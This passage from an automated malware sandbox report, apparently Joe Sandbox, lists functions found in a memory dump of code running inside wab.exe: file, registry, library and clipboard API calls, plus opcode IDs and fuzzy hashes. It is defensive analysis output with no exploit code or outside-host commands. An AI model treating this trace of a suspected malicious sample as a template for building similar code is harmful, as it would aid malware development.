                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863332320-0
                                                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3655998216-0
                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1828521557-0
                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2081463915-0
                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2136311172-0
                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1936579350-0
                                                                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                • String ID:
                                                                                                                • API String ID: 2565263379-0
                                                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                • memcpy.MSVCRT ref: 004098B5
                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014503067-0
                                                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
